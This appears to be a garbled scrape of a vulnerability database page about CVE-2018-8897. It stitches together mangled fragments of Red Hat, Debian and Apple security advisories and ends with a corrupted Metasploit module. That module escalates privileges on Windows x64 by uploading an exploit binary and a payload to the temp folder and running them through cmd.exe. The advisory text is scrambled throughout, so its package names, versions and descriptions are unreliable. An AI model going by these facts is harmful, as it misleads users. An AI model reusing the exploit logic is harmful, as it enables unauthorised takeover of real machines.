862.2.3.el7.. Desctrpm dle -3><08. 862.2.3.el7.. Desctrpm dle -asc on a-3><08. 862.2.3.el7.. Desctrpm pythab-dle -3><08. 862.2.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 862.2.3.el7.. Desctrpm rnterprise Linux Server (vWorkmponerdoOdlingvic) - 7): . Desc:ersion -asc -dsc on a-3><08. 862.2.3.el7.. Desctrpm rsion -asc on a-3><08. 862.2.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 862.2.3.el7.. Desctrpm rsion -false-asc on a-3><08. 862.2.3.el7.. Desctrpm rsion -false-libe-asvn -3><08. 862.2.3.el7.. Desctrpm dle -asc on a-3><08. 862.2.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 862.2.3.el7.. Desctrpm rs are contain tropeGPG sign SS ornterprisprobcom/files Ouis nivild s390x, ng lly thetingareas, signaed Htrope for each vVE lccess.redhat.com/errata/RH Mailingtedge ni/ 7. s: CVE-2018-lccess.redhat.com/errata/RH Mailingcve-8897 <7-26939lccess.redhat.com/errata/RH Mailingcve-8897

- 漏洞信息 (F147550) 33"able width="90%" border="0" align="center"> Red Hat SApp"90Advisory 2018-1353-01 - Name-https://wormID:F147550) 33 2018-05-08 00:00:00 Red Hat &App"90href="" target=cketston.orse ueta/RH uprevtH Mailing"_blank">https://wse ueta/R> advisory,denial o linux,redse ue CVE-2018-1087,CV8-4187-88974206-8897
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======512

APPLE-353-01.t Name-< 20nilingvicon about Devvul
APPLE-353-01.t 4-24-20Advisory Uhaving-01.t 01y Fix(es):
Uhaving-01.t 01d include fof afollow, OrneCr

= Red Hael
Afor each vul:liscOS High SiSA-2 <0813.4
I. Des: Andse uf the ilisyctedeach theginuxeleasf Liux vritges
on:

The ker A meml o cby udling coity waed include awith
3. r ved
exceptleads to.
88974206: I_inBeerinuxGoogch ecujins Zero

Ksion 
Afor each vul:liscOS High SiSA-2 <0813.4
I. Des: Alisuf ious6se uf the ilisyctedeach theexix(lHtrobitrary
clasawith
rsion iux vritges
on:

The ker In some.circummpo-201, some. system.

Securislisycnot
expins ept r syslytleadsbior Intn iures:

Red H_dnb
n handling
aft s certinuxins:

Th kes.el pacoity se ear(CVE-bh vVE ior
undocu didty ridseeese rinux64
xins:

Th kes.eAndstte a s might
utt
uzeblem r handling leads to theginuxdhat.cbtheR to 0 orD6dhat.c
sensipive meml o eptcn Lrol. system.

Securit r clude .
8897
  :6mirs i discover,6rson of Everd
(n thedscr/dowin/ech LLC)inuxech LLC discover
Eid    inty Msyc8,g-01.

L thPcludidonerd
Afor each vul:liscOS High SiSA-2 <0813.4
I. Des: Pr cludurity isuf iouslytcraft d text mess  : isycDoS btheUI
spoof to
on:

The ker A spoof toacoity exan.sion x64
xleads to nuxURLs.el is
coity waed include awith
3. r vedon put valida Relev1087,CV8-4187: Zhiyato Zeto (@Wen.sr)inuxTE-20ny has rate
>
	 
	

- 漏洞信息 (F147550) 651"able width="90%" border="0" align="center"> Red Hat SDebi_inAdvisory 2018-13534201-https://wormID:F147550) 651 2018-05-08 00:00:16 Red Hat &Debi_inhref="" target=cketston.ordebi_i.orgH Mailin"_blank">https://wdebi_i.org> advisory,denial oflity from the linux,redhat CVE-2018-1087,CV8-10471,1087,CV8-10472-889720981-889720982-8897
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======512

- -------------------------------------------------------------------------
Debi_inAdvisory 2018-1353DSA-4201-20471=889720472 889720981 i                 889720982

Multip"90lity from
thies sece teen disc version x64
xXen hyplner-13rneC897
20471li    mi exceptwaeddisc version x64
xmthigaling taginust Melt1475ves a i    heuldecluulton x service vulnerab.

889720472li    mithabedD frrdodisc versiothatefecby ins pTXs to nuxCDROM
3.ain i    h_incluulton xon about Devdisclosurb.

889720981li    J_inBeul a  disc versiothatemal aboeD6 serabimlasl theuldecluulti    n x service vulnerab.

889720982

    RogELSPau"Monneodisc versiothatefecby ins leads toce vhigh uxeri88-1
    ev0ny timEve heuldecluulton x service vulnerabeorD6potdiduvily
    ux vritge escalonerd.

Frobleenste="90distribunerdo(stretch),x64
te pro="9ms sece teen versioin
v9.88-1 4.8.3+/doet2+shim4><08.+/doet3-1+dnb9u6.

Wed.
cnereniothateyou upgradeeyour xen contain .

Frobleenseverity ravisory mponusce vxen cchite its secu
its ravisory traca s http at:www.debiaravisory-traca srdebi_i.orgHtraca s/xens
Furrmation about Devx86_64Debi_inAdvisory 2018-13i01, lly
these up
t are cld upcbtheyour SecuritorD6frequently askty qu sting th_inbe
f und at:access.ren.ordebi_i.orgH

Mailin/

Mst
ubuntu-s: debi_i-ravisory-mailing @ian.srdebi_i.orgIN PGP SIGNATURE-----

iQKTBAEB
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlr7PHoACgkQEMKTtsN8
TjbvyBAAqSJFsDcTo75hggE1faIttXR3UKOwJ4eSKbkf3G6/JnvotuO5z4bQXDBC
XZfkL6kOTl579vmCGgCvBv/SrrPrJ1ibhrw+Dz1MIcjX4Yt9mb6NriWuMTObknca
uw6qJakWZTB3tFcp3LlmN80B8lY/67XR8mQaZ4f0yHhGEfqIunEtSgLelmp5lLu2
M/m1iH9zQon3muhQiXiHJeMg1ghJ3xvFKbuEU9ux h4NNinxquv0pmAzfbPCCBN6
E4cuEjArzdnwLydeWfCoLrFOZh5rvoMTmmK8gj2/KVlbC5YgJ5/xVlc89B4PaJKL
m3oUV2dnLEpubC7uuXSOoejMnfbPcOGM4VYrmuIuxEfZZVNYE/NxvmNCZ+JDzQV7
Z939vOgyqyuojFFt7lgvoCWM2Q3xDRMrE9akK1KyAGmvyRzoczblw8N6dzL8sinu
gs5LUE/5dCJWQWv4IPz/V/nl50Lh+tYjbdVuZaiXxKYiqiWuCY0Ea+8QIb2UWGrk
rC2BUYaoYBEo0vQhzBIi91E2hyQ+2Y6+zP6zTVTEA8PDw2YnfdffzydQ3Z9l4OSN
IoTOojXPpMdcCSVzBC5OkvzBuQ6qzkVh3vftxajYazuiSrPJl8KenLJ6jFlpCzA3
p+140rFiElDCUkHacCmfs4zWQ+/ZLcoAppIxvxDEZYWyRJp3qgU=
=KAUD PGP SIGNATURE-----
    
	 
	

- 漏洞信息 (F147550) 646"able width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 - 523 https://wormID:F147550) 646 2018-05-08 00:00:15 Red Hat   advisory,denial of service,kernel ,lity from the,clasaexix(ling linux,redhat CVE-2018-1087,CVd>2087-88972088-88972222-8897 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ======256============================================================== A securi ecurity Advisory Synopsis: Moderate:I revteat:ad> -virtuntezut De-host b nfix orD6enha/pr did visory ID: RHSA-2018:1353-01 Pr524 < Red Hat EnterprisVirtuntezut De URL: https://access.redhat.com/errata/RHSA-2018:1353 Issue524te: 2018-05-08 CVE Na15s: CVE-2018-8897 ===2087e88972088n88972222 i 1087,CVd>================================================================== 1. Summary: An updateUld updad> -virtuntezut De-host contain tthatefix ratinvicbugseorD6 in various6enha/pr did, ropeable for Red evant releases/architectures: Red Hat EnHEL 7-e, wd8:1EV-HHat En1EV 4 (builD6requirs did,)a--390x, x8. DescrnterprisVirtuntezut De 4 Hyplner-13Hat En1EL 7a--390x, ription: The kernel pad> -virtuntezut De-host contain tpr vidsrences urity Virtuntezut De Host.el pre contain t denial d> -archite-virtuntezut De-host, ovirt-nlasn orD6rhev-hyplner-13tes urity Virtuntezut De Host, (RHVH) rop ins:alleD6usurity iperivicbuilD6ofEnterprise Linux 5 Enel thwith onlreas, contain trequirsiocurhost virtuntlischinn . RHVH feaed Hled CockpitiusEL inLinfach vulnmonittem (C64 xlost' treseurceseorD6pinfty.urityd.uristrapive task . Inrious fGlun.srFSnfixesivuln88972088- dhcpnfixesivuln88972222- rsion ifixesivuln88972087n orD6rsion ifixesivuln8897r moe Antu-s6ofEb89s versionux kble havingble for each n x64 xdiscnicntlNoins book:eccess.redhat.com/errata/RHdocu didthe i/en-us/m/e_rra_virtuntezut De/4.2/ht ml/tiscnicnt_notes/ 4: olue kerneBef75edse upm (C64 as havinivmakeesd Htrl iuxeviouslytarchited SA-201 releases/theyour Securitsece teen se ufed.neF of s390x, ng lly these upate as havinivits securneccess.redhat.com/errata/RHTX23467" 2974891va5.: 89s versio(ugzilla.redhat.com/show_bug.nel:<357247a--rhvh 4:d. Ref aft s ins:all sllys "4m[t s.ur upd]" orD6iakes loto the. Ref:<374007a--[RFE] RHV-HHdoeilabtf sfaultotheLVMel in ecuvi88-1 toi1420068 --[RFE] RHV-HHslluldemeet NIST 800-53 pTXtilingm (Crequirs did,S or sfaulti1422676 --[T stcOnlr] T stcAnsiach lbaybookevulnregistrapird <429485 --[RFE] Imge, wd8bayEve slluldebpeaam SSwith '%{aam }-%{v9.88-1}-%{archite}' ins:oS bofE%{aam }-%{v9.88-1} <43339/noakdump heuldefill up /var nloadecuritwhi"90%sor to the/var/cr = <443965 --Libvirtgblediseachd ng RHVH host 1454536 --Hon.siEnginn ratup f90x, if RHV-HHtimEzonn < UTC rat dur, O_ins:allonerd 1474268 --RHVH hostedislbays "upgradee for each"ion about Devo x64 xenginn aft s register, O_untilior havingblearchited 1489567 --Hon. Softript HdoeilabtfsllyaexictaRHVH v9.88-1 any==ch 150116 -virtuntezut De-host-4.17 <80403.1 1565497 --Imge, w6che a FAILE--inad> -virtuntezut De-host-4.27 <80409.1 1566837noa8897 ===2087eKe cor: KVMn exception handling leads to DoS (CVE-wro O_dnb nste a value -virtuntezut De-host-4.27 <80508.0.el7_5.softrpm 390x, :ed> -virtuntezut De-host-3.ain-cld up-4.27 <80508.0.el7_5.390x, trpm nHEL 7-e, wd8:1EV-HHat En1EV 4 (builD6requirs did,):e Deurce:eimge, wd-1.0.16-0.1.el7ev.softrpm ovirt-nlas-ng-4.2.0-0. <70814.0.el7.softrpm d> -archite-virtuntezut De-host-4.273.0.el7.softrpm 390x, :eimge, wd-1.0.16-0.1.el7ev.390x, trpm ovirt-nlas-ng-nlasctl-4.2.0-0. <70814.0.el7.390x, trpm pythab-imge, wd-1.0.16-0.1.el7ev.390x, trpm d> -virtuntezut De-host-3.ain-cld up-lbacwholder-4.273.0.el7.390x, trpm . Desc:ed> -archite-virtuntezut De-host-4.273.0.el7.. Desctrpm rs are contain tropeGPG sign SS ornterprisprobcom/files Ouis nivild s390x, ng lly thetingareas, signaed Htrope for each vVE lccess.redhat.com/errata/RH Mailingtedge ni/ 7. s: CVE-2018-lccess.redhat.com/errata/RH Mailingcve-8897

- 漏洞信息 (F147550) <8549
8549"able width="90%" border="0" align="center"> Red Hat SMicrosoft Windlys POP/MOV SS LocntlPr vritge Eleasf De abel>漏ttp://packetstormsecurity.com/files/147550/" ta8549="_blank">https://wormID:F147550)8549 2018-05-08 00:07-13 Red Hat &rson of Everd,can<357,bwat Eve-r7,Nenfoja Mulasmajicnhref="" target=cketston.orms39sploiata/R"_blank">https://wms39sploiata/R> advisory,exploia,rs ot/td> ,clasaexix(ling linux,red CVE-2018-1087,CVd> -----BEGI## #el isrmlaule,requirssrMs39sploia:access.rems39sploiata/R/147550/R #eCuVr id seurce:access.regithubta/R/rapid7ems39sploia-frameworkI## requirs 'msfts/re/pon./cnerab' requirs 'msfts/re/pon./nloa' requirs 'msfts/re/pon./windlys/ux v' requirs 'msfts/re/pon./windlys/registry' requirs 'msfts/re/exploia/exa' ush: rMs39sploiaMlaule,< Msf::Exploia::LocntbleRs:/ = Ehanll idRs:/ toi t denial Msf::Pon.::Cnerab t denial Msf::Pon.::Fi"9 t denial Msf::Pon.::Windlys::Px v t denial Msf::Exploia::EXEi tas t diduviize(on ag= {})ble> susys(o your14755(on a,tr> ' ' => 'Microsoft Windlys POP/MOV SS LocntlPr vritge Eleasf De Vity from the',tr> 'on: The ke' => %q{

Red Hal isrmlaule,exploias-aSlity from the n xa mponr did n x64 xSecurit r gram.uritguide

Red Haof 64 xIntn i64 orD6IA-32iures: Red Hs softript asvn sys' tnfountlbeuritmisleadsbi

Red Hanuxvarious6 system. Securitd> es,ecluult, O_in unexpins SS ehavi13Hat E#DBadvisory,excpeling tthateipt as CVr SS orMOV SS t EPOP SS.

Red Hal isrmlaule,will up50/Reas, cre-cneprity exploia orD6ure it theexix(lHtof afigvi

Red Hapay50/Rein alig theginuxrs ot/ clasaexix(lingt

Red },tr> 'Li s ' => MSF_LICENSE,tr> 'Author' =>

Red Ha[i 'rson of Everd', # Origigvicdisc very (@nsonech LLC)i 'renfoja Mulasmajic', # Origigvicdisc very (@0xreni)i 'C_inBAPlA1/4k,<can<357>', # PoCi 'bwat Eve-r7' # msfrmlaulei ],tr> '> 'SluduonTypes' => [ 'meLinuxeLin' ],tr> 'Tlank"s' =>

Red Ha[i [ 'Windlys x64', { 'Ares' => ARCH_X64 } ]i ],tr> 'DsfaultTlank"' => 0,tr> 'DisclosurbDonr' => 'May 0808 00',tr> 's: CVE-201' =>

Red Ha[i ['108', ',CVd> '],tr> ['EDB', '446 '],tr> ['BID', '104071'],tr> ['URL', 'ccess.regithubta/R/can<357-8897 ['URL', 'ccess.reblog.can.ac/ 'DsfaultOdlings' =>

Red Ha{i 'DiseachPay50/RHeadsbr' => 'F----'i }i ))

Reregister_odlings([i OdlSta, O.new('EXPLOIT_NAME',tr> [ ----, 'Tf afil iamECVE-ure frobleenexploia bigvry (%RAND%S or sfault).', nil]),i OdlSta, O.new('PAYLOAD_NAME',tr> [ ----, 'Tf afil iamECfrobleenpay50/ReVE-bh ushd ng leenblank"xlost (%RAND%.exiS or sfault).', nil]),i OdlSta, O.new('PATH',tr> [ ----, 'PathCVE-wrie ebigvries (%TEMP%S or sfault).', nil]),i OdlInt.new('EXECUTE_DELAY',tr> [ ----, 'Tf anumberinuxcomon (CVE-delsyctef75edexix(li (C64 xexploia', 3])i ])i endi tas tratupble> susysble> @exploia_iamEC= aritye['EXPLOIT_NAME'] || Rex::Text.rorD_text_alpha((rorD(8)+6))i @pay50/R_iamEC= aritye['PAYLOAD_NAME'] || Rex::Text.rorD_text_alpha((rorD(8)+6))i @exploia_iamEC= "#{exploia_iamE}.exi" unlt.cbexploia_iamE.match(/\.exi$/i)i @pay50/R_iamEC= "#{pay50/R_iamE}.exi" unlt.cbpay50/R_iamE.match(/\.exi$/i)i @urip_pathC= aritye['PATH'] || sluduon.Sec.henfig.nk"env('TEMP')i @pay50/R_pathC= "#{urip_path}\\#{pay50/R_iamE}"i @exploia_pathC= "#{urip_path}\\#{exploia_iamE}"i @pay50/R_exiS= gey frur1pay50/R_exii endi tas tvalida e_acpive_host begintr> lost = sluduon.Sluduon_host ux nt_mponus("Aturipr to thePr vEsc ng #{Secon a['1neputer']}uviaiSluduon RHS#{ aritye['SESSION']}")

Rerescue Rex::Pon.::MeLinuxeLin::Requ stExcept=> ei n g("#{e.ush: } #{e.mess :}\n#{e. e atrace * "\n"}")

ReRera 5 EMsf::Exploia::F90xhd, 'Cluldeabtfconnect theSluduon'i endi endi tas tvalida e_rs ot/_path(path)

Reunlt.cbdi insory?(path)

Re ef90x_with(F90xurb::Unreacheach, "#{path}Hdoeilabtfexan. ng leenblank"")

Reendi endi tas tvalida e_blank"

Reif Secon a['Ares: Red H'] == ARCH_X86

Re ef90x_with(F90xurb::NoTlank", 'Exploia clasaisr64-bit onlr')

Reendi Reif Secon a['OS'] =~ /XP/

Re ef90x_with(F90xurb::Unkn475, 'Tf aexploia bigvry doeilabtfsuprevt Windlys XP')

Reendi endi tas t surb_clean_d stinsf De(path)

Reif fil ?(path)

Re eux nt_mponus("#{path}Halreadyfexan.s ng leenblank"tionler to...")

ReRebegintr> fil _rm(path)

Re e eux nt_mponus("onlerhd #{path}")

ReRerescue Rex::Pon.::MeLinuxeLin::Requ stExcept=> ei n g("#{e.ush: } #{e.mess :}\n#{e. e atrace * "\n"}")

ReRe eux nt_excep("Uneach thednlerh #{path}")

ReReendi Reendi endi tas t surb_clean_exploia_d stinsf Dei Reensurb_clean_d stinsf De(exploia_path)i endi tas t surb_clean_pay50/R_d stinsf Dei Reensurb_clean_d stinsf De(pay50/R_path)i endi tas tup50/R_exploiai Rebocnt_exploia_pathC= ::Fi"9.join(Msf::Cenfig. a_di insory, 'exploias', 'cve7 Reup50/R_fil (exploia_path,ebocnt_exploia_path)

Reux nt_mponus("Exploia up50/Rhd ng #{Secon a['1neputer']}uthe#{exploia_path}")

endi tas tup50/R_pay50/R

Rewrie _fil (pay50/R_path, pay50/R_exi)

Reux nt_mponus("Pay50/R (#{pay50/R_exi.l igth}Hbytes) up50/Rhd ng #{Secon a['1neputer']}uthe#{pay50/R_path}")

endi tas texix(lH_exploiai Resleep( aritye['EXECUTE_DELAY'])

Reux nt_mponus("Rungm (Cexploia #{exploia_path} with pay50/Re#{pay50/R_path}")

output = cmR_exic('cmR.exi', "/c #{exploia_path} #{pay50/R_path}")

vux nt_mponus(output)

endi tas texploiai Rebegintr> valida e_acpive_host tvalida e_blank"

Re tvalida e_rs ot/_path(urip_path)

ReReensurb_clean_exploia_d stinsf Dei Re t surb_clean_pay50/R_d stinsf Dei Re tup50/R_exploiai Re tup50/R_pay50/R

Re texix(lH_exploiai Rerescue Rex::Pon.::MeLinuxeLin::Requ stExcept=> ei n g("#{e.ush: } #{e.mess :}\n#{e. e atrace * "\n"}")

ReReux nt_excep(e.mess :)

ReReensurb_clean_exploia_d stinsf Dei Re t surb_clean_pay50/R_d stinsf Dei Reendi endi tattr_roS Ev :exploia_iamE tattr_roS Ev :pay50/R_iamE tattr_roS Ev :pay50/R_exii attr_roS Ev :urip_path tattr_roS Ev :pay50/R_path tattr_roS Ev :exploia_path endi Re